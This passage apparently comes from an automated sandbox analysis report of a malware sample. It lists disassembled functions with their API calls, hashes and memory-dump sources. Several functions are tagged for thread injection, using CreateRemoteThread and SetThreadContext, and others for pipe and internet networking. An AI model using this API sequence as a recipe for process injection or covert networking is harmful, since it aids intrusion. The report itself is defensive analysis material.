Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
String ID: %s as %s\%s: %d
API String ID: 3435635427-816037529
Opcode ID: c4d0bd8c8d1650db23838cda0cb1772cb4ec40593c69114b5c06a473d9adb743
Instruction ID: e35d60354357338ca1f6a5a4dc02a99f8df95d6dd3e470bf3dc566ad5f04a19a
Opcode Fuzzy Hash: c4d0bd8c8d1650db23838cda0cb1772cb4ec40593c69114b5c06a473d9adb743
Instruction Fuzzy Hash: 90514D32308B8686E725EB16B4407AAB7B5FBC9BC0F144125EECD87B59DF38C1558B40

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33B1F7 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA33B21D

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33B229
__crtIsPackagedApp.LIBCMT ref: 0000017DEA33B23A
_dosmaperr.LIBCMT ref: 0000017DEA33B284

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: 9ffea0a240096b91e1fdf5f90bdd08ebf8829419d51855dc8a3edd7770b2e173
Instruction ID: 5173daa00fcbaa154f79bbb648de5cd976d95c8f2839b097927bf6dc80a273fb
Opcode Fuzzy Hash: 9ffea0a240096b91e1fdf5f90bdd08ebf8829419d51855dc8a3edd7770b2e173
Instruction Fuzzy Hash: 6731803021CA0A4FEB46AFA9A4053B976F1FFC8315F14466DE46EC72A1DE38C9458743

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA34592F Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA345948

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

__lock_fhandle.LIBCMT ref: 0000017DEA345990
__doserrno.LIBCMT ref: 0000017DEA3459C5
_errno.LIBCMT ref: 0000017DEA3459CC
_unlock_fhandle.LIBCMT ref: 0000017DEA3459DC

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 4120058822-0
Opcode ID: bb62ca6a869fd799953b52af43a8a16501762a68a04c9f5967b7872d49b086bf
Instruction ID: cc432e61581680df389b46285bae548eb723953d76d30dcf8dc55cbcc7b61b11
Opcode Fuzzy Hash: bb62ca6a869fd799953b52af43a8a16501762a68a04c9f5967b7872d49b086bf
Instruction Fuzzy Hash: C021C431A0C64B4EF2575BE8A8963FD3AB0AFC5321F150218E42E8F1D3DE649D048253

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA74BAD0 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000017DEA74BB04

Part of subcall function 0000017DEA73E220: _getptd.LIBCMT ref: 0000017DEA73E236
Part of subcall function 0000017DEA73E220: __updatetlocinfo.LIBCMT ref: 0000017DEA73E26B
Part of subcall function 0000017DEA73E220: __updatetmbcinfo.LIBCMT ref: 0000017DEA73E292

_errno.LIBCMT ref: 0000017DEA74BB1F
_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA74BB2A

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: 328d8a49d1344a363d2d9206dfc988e432a709b8c59ca3d65d1e60162fe80d08
Instruction ID: 5998b975719137a792ac0941c1b428a08065f09872f39721ec1d740d1b0868e4
Opcode Fuzzy Hash: 328d8a49d1344a363d2d9206dfc988e432a709b8c59ca3d65d1e60162fe80d08
Instruction Fuzzy Hash: 2C31813160C74A85E622EB12A4807ED6AB5EBD4BD0F654131EE9C4BB89CF34CA45C701

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7325CC Relevance: 10.6, APIs: 7, Instructions: 71threadinjectionlibraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0000017DEA7325FB
GetProcAddress.KERNEL32 ref: 0000017DEA73260C
CreateRemoteThread.KERNEL32 ref: 0000017DEA732653
GetThreadContext.KERNEL32 ref: 0000017DEA73268D
SetThreadContext.KERNEL32 ref: 0000017DEA7326A7
ResumeThread.KERNEL32 ref: 0000017DEA7326B8

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Thread$Context$AddressCreateHandleModuleProcRemoteResume
String ID:
API String ID: 2251766279-0
Opcode ID: cda92236576d422590614138ebd043a8d54cf374cbff29895d120080c94ff4ce
Instruction ID: dd9b489407ef646884fc62ebf04a48839a2a59f28f128b0cacdac7ed58821026
Opcode Fuzzy Hash: cda92236576d422590614138ebd043a8d54cf374cbff29895d120080c94ff4ce
Instruction Fuzzy Hash: 7831BF72208B8686E722DF16B8543AA73B1FBD8BD0F254534DE8D4BB94DF38C6458B41

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7333D8 Relevance: 10.6, APIs: 7, Instructions: 58pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0000017DEA73340B
CloseHandle.KERNEL32 ref: 0000017DEA733415
CloseHandle.KERNEL32 ref: 0000017DEA73341F
DisconnectNamedPipe.KERNEL32 ref: 0000017DEA733436
CloseHandle.KERNEL32 ref: 0000017DEA733440
free.LIBCMT ref: 0000017DEA733475
free.LIBCMT ref: 0000017DEA733487

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CloseHandle$free$DisconnectNamedPipe
String ID:
API String ID: 3879126888-0
Opcode ID: 1f44d1ca3af26b607275eec106c5fff713e0699c1995d1b408019d5d241d12ef
Instruction ID: e940d6adc6f6a9a347dc8c49e872ff375e12f249f76af7d4f58bf8080796319a
Opcode Fuzzy Hash: 1f44d1ca3af26b607275eec106c5fff713e0699c1995d1b408019d5d241d12ef
Instruction Fuzzy Hash: EF211C31618A5AD2EAA7EB12F6442B86370FBC4FD0F295421DF8D0BF54CF24D6A48302

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7340A0 Relevance: 10.6, APIs: 7, Instructions: 52COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0000017DEA7340B1
ioctlsocket.WS2_32 ref: 0000017DEA7340D2
GetTickCount.KERNEL32 ref: 0000017DEA734117
ioctlsocket.WS2_32 ref: 0000017DEA734139

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CountTickioctlsocket
String ID:
API String ID: 3686034022-0
Opcode ID: f0f6b3c44b94660aacd045b44c8b61ad45f8cbe6460a0484ebb3670360ef76d3
Instruction ID: 0812e0b2a0af06f3a27bbaaa944bffa4f33aec8a5241b33e02f19b3aa9e1caff
Opcode Fuzzy Hash: f0f6b3c44b94660aacd045b44c8b61ad45f8cbe6460a0484ebb3670360ef76d3
Instruction Fuzzy Hash: F011E63120894B86F616EB65F8443E8B371ABC47A6F610530DA9D8A6E0DF78C9898702

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA732D80 Relevance: 10.6, APIs: 7, Instructions: 51pipefileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0000017DEA732D9E
WaitNamedPipeA.KERNEL32 ref: 0000017DEA732DB3
CreateFileA.KERNEL32 ref: 0000017DEA732DDD
SetNamedPipeHandleState.KERNEL32 ref: 0000017DEA732DFF
DisconnectNamedPipe.KERNEL32 ref: 0000017DEA732E0C
CloseHandle.KERNEL32 ref: 0000017DEA732E15
SetLastError.KERNEL32 ref: 0000017DEA732E22

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: NamedPipe$ErrorHandleLast$CloseCreateDisconnectFileStateWait
String ID:
API String ID: 321441075-0
Opcode ID: 8e22a79f635daea726f16e9a1de1856625349972feb6a0dc3e05b0ce7be68105
Instruction ID: 3d76800b11323ed1ca32e947a0fec8e3943a3cefa5858c760aa93ac2e7397af0
Opcode Fuzzy Hash: 8e22a79f635daea726f16e9a1de1856625349972feb6a0dc3e05b0ce7be68105
Instruction Fuzzy Hash: AA11B431218A5682F712EB21F4087BE2274EFD4BE5F554634EA9E4BAD4CF7CC5488742

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA73CAB0 Relevance: 9.2, APIs: 6, Instructions: 166COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA73CAEC

Part of subcall function 0000017DEA73DA10: _getptd_noexit.LIBCMT ref: 0000017DEA73DA14

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73CAF7
memcpy_s.LIBCMT ref: 0000017DEA73CBBC
_fileno.LIBCMT ref: 0000017DEA73CC27
_filbuf.LIBCMT ref: 0000017DEA73CC55
_errno.LIBCMT ref: 0000017DEA73CCA5

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$_filbuf_fileno_getptd_noexit_invalid_parameter_noinfomemcpy_s
String ID:
API String ID: 2328795619-0
Opcode ID: 1e9c5c85f24affc1f4ad8e74ab22dcd61c8d6539f6415cbf48a583a031d25dd9
Instruction ID: 5a1fbafb35f3c922c651773cea5bf91e4ce9c5f3d21e623021a0aad3db6ba06a
Opcode Fuzzy Hash: 1e9c5c85f24affc1f4ad8e74ab22dcd61c8d6539f6415cbf48a583a031d25dd9
Instruction Fuzzy Hash: F551F93230C24A41F617EA6675007FA69B0ABC4BF4F2646319AAD4BBD5CE34C65D8242

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7460F4 Relevance: 9.1, APIs: 6, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_mtinitlocknum.LIBCMT ref: 0000017DEA746121

Part of subcall function 0000017DEA73FBF8: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73FC15
Part of subcall function 0000017DEA73FBF8: _NMSG_WRITE.LIBCMT ref: 0000017DEA73FC1F

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000017DEA7461A4
EnterCriticalSection.KERNEL32 ref: 0000017DEA7461C0
LeaveCriticalSection.KERNEL32 ref: 0000017DEA7461D0
_calloc_crt.LIBCMT ref: 0000017DEA746246
__lock_fhandle.LIBCMT ref: 0000017DEA7462AE

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterInitializeLeaveSpin__lock_fhandle_calloc_crt_mtinitlocknum
String ID:
API String ID: 445582508-0
Opcode ID: 950df99e0b1803de4249a0c80206a0c7c3be2a4a1d9f79e42705502b1673a992
Instruction ID: d3a5d927414b28ede94e5984ffcedc9dc1e86034d4b1c5d870be830375450380
Opcode Fuzzy Hash: 950df99e0b1803de4249a0c80206a0c7c3be2a4a1d9f79e42705502b1673a992
Instruction Fuzzy Hash: 1B51CE7221C64A82EB12EF20E8403B9A7B5FBD8B98F154165DE8D4B3D5CF38CA45C702

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA730938 Relevance: 9.1, APIs: 6, Instructions: 126COMMON

Download Yara Rule

APIs

Part of subcall function 0000017DEA734720: malloc.LIBCMT ref: 0000017DEA73473C

Part of subcall function 0000017DEA73C5C0: _errno.LIBCMT ref: 0000017DEA73C517
Part of subcall function 0000017DEA73C5C0: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73C522

fseek.LIBCMT ref: 0000017DEA7309D4

Part of subcall function 0000017DEA73CE44: _errno.LIBCMT ref: 0000017DEA73CE6C
Part of subcall function 0000017DEA73CE44: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73CE77

_ftelli64.LIBCMT ref: 0000017DEA7309DC

Part of subcall function 0000017DEA73CEB8: _errno.LIBCMT ref: 0000017DEA73CED6
Part of subcall function 0000017DEA73CEB8: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73CEE1

fseek.LIBCMT ref: 0000017DEA7309EC

Part of subcall function 0000017DEA73CE44: _fseek_nolock.LIBCMT ref: 0000017DEA73CE95

GetFullPathNameA.KERNEL32 ref: 0000017DEA730A0F
malloc.LIBCMT ref: 0000017DEA730A2C

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

Part of subcall function 0000017DEA72CFCC: malloc.LIBCMT ref: 0000017DEA72CFDF

Part of subcall function 0000017DEA72CFFC: htonl.WS2_32 ref: 0000017DEA72D007

fclose.LIBCMT ref: 0000017DEA730AE9

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfomalloc$fseek$AllocFullHeapNamePath_callnewh_fseek_nolock_ftelli64fclosehtonl
String ID:
API String ID: 3587854850-0
Opcode ID: 3da8f025ece7394c703a7f887b7126d067a18409367c8c891ce5d9828b598cd7
Instruction ID: 6ca0df7a322f9de3f5e95f1fbfaf5c3ea393fab18dbec7c826b2d35dba5ad28c
Opcode Fuzzy Hash: 3da8f025ece7394c703a7f887b7126d067a18409367c8c891ce5d9828b598cd7
Instruction Fuzzy Hash: 6441B43230868942E616FB12B4103FA6671BFC8BD0F518131EE9E0FBD6DE38C6098742

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA734394 Relevance: 9.1, APIs: 6, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

GetACP.KERNEL32 ref: 0000017DEA7343AC
GetOEMCP.KERNEL32 ref: 0000017DEA7343B6
GetCurrentProcessId.KERNEL32 ref: 0000017DEA7343DC
GetTickCount.KERNEL32 ref: 0000017DEA7343E4

Part of subcall function 0000017DEA73C3EC: _getptd.LIBCMT ref: 0000017DEA73C3F4

GetCurrentProcess.KERNEL32 ref: 0000017DEA734420

Part of subcall function 0000017DEA72FF18: GetModuleHandleA.KERNEL32 ref: 0000017DEA72FF2D
Part of subcall function 0000017DEA72FF18: GetProcAddress.KERNEL32 ref: 0000017DEA72FF3D

GetCurrentProcessId.KERNEL32 ref: 0000017DEA734492

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressCountHandleModuleProcTick_getptd
String ID:
API String ID: 3426420785-0
Opcode ID: ac2cadb21b7d3e22279a6dd461b8896bd4e31f88a9562ce911e8d9ee9c12a71b
Instruction ID: 53baaf62fa14c65bdc80ab25dc9a8bf173820f71f1de0fd51de69b9bdd185424
Opcode Fuzzy Hash: ac2cadb21b7d3e22279a6dd461b8896bd4e31f88a9562ce911e8d9ee9c12a71b
Instruction Fuzzy Hash: B1417B7171861A95FB02FB71B8413F927B0AFC5794F900035DD8D4BA96DE38C6098726

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA72E720 Relevance: 9.1, APIs: 6, Instructions: 108networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000017DEA73A948: RevertToSelf.ADVAPI32 ref: 0000017DEA73A956

InternetOpenA.WININET ref: 0000017DEA72E7DD
InternetSetOptionA.WININET ref: 0000017DEA72E7FD
InternetSetOptionA.WININET ref: 0000017DEA72E815
InternetConnectA.WININET ref: 0000017DEA72E84B
InternetSetOptionA.WININET ref: 0000017DEA72E888
InternetSetOptionA.WININET ref: 0000017DEA72E8B3

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Internet$Option$ConnectOpenRevertSelf
String ID:
API String ID: 1513466045-0
Opcode ID: 411921f0b780bda79444755ea1b09c1352abee8551b093482236e8c856c606c8
Instruction ID: e61af88dd983fa0cd0d628d3aff0853873f2d0937f4aa4ef7e2eb6a0491f58f5
Opcode Fuzzy Hash: 411921f0b780bda79444755ea1b09c1352abee8551b093482236e8c856c606c8
Instruction Fuzzy Hash: 0241CC7560874B82FB56EB11B450BF86BB5EBC1B84F5500389ACD1BB96CE38CA098742

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA735594 Relevance: 9.1, APIs: 6, Instructions: 99networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA7355C6

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

htonl.WS2_32 ref: 0000017DEA7355F9
recvfrom.WS2_32 ref: 0000017DEA73563D
WSAGetLastError.WS2_32 ref: 0000017DEA73564A

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$AllocErrorHeapLast_callnewhhtonlmallocrecvfrom
String ID:
API String ID: 2310505145-0
Opcode ID: 7b82969d95b8156ac40bd70badc804edefe668ed425a8211da48a1875c208419
Instruction ID: 1fa1489b684bc2b110d3241de4e1f3fe0b1bca1f9c1bdaeb27223efc76c74e26
Opcode Fuzzy Hash: 7b82969d95b8156ac40bd70badc804edefe668ed425a8211da48a1875c208419
Instruction Fuzzy Hash: A2419E7121864A86E713EF26F4507B9B7B1FBC8BA4F614131DA8D4B6A4DF38C644CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33BA07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 0000017DEA33B95E

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33B969
_getstream.LIBCMT ref: 0000017DEA33B989
_errno.LIBCMT ref: 0000017DEA33B99B
_errno.LIBCMT ref: 0000017DEA33B9AD
_openfile.LIBCMT ref: 0000017DEA33B9DB

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errno$_getptd_noexit_getstream_invalid_parameter_noinfo_openfile
String ID:
API String ID: 1547050394-0
Opcode ID: f4b46934b61cd0a6c515992788bbf3f7098805acb66c62ab169b4e9252767cc2
Instruction ID: eda1455d357dbb7c2bb6b493291f516ab952dc067077304a22cb625620717080
Opcode Fuzzy Hash: f4b46934b61cd0a6c515992788bbf3f7098805acb66c62ab169b4e9252767cc2
Instruction Fuzzy Hash: 1821833061CA4F4FF797AFA864063B966F1EFD9310F04056AA45ECB1A2DE24CE448387

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA732BC8 Relevance: 9.1, APIs: 6, Instructions: 72threadinjectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetThreadContext.KERNEL32 ref: 0000017DEA732C09
SetThreadContext.KERNEL32 ref: 0000017DEA732C31
ResumeThread.KERNEL32 ref: 0000017DEA732C3E

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

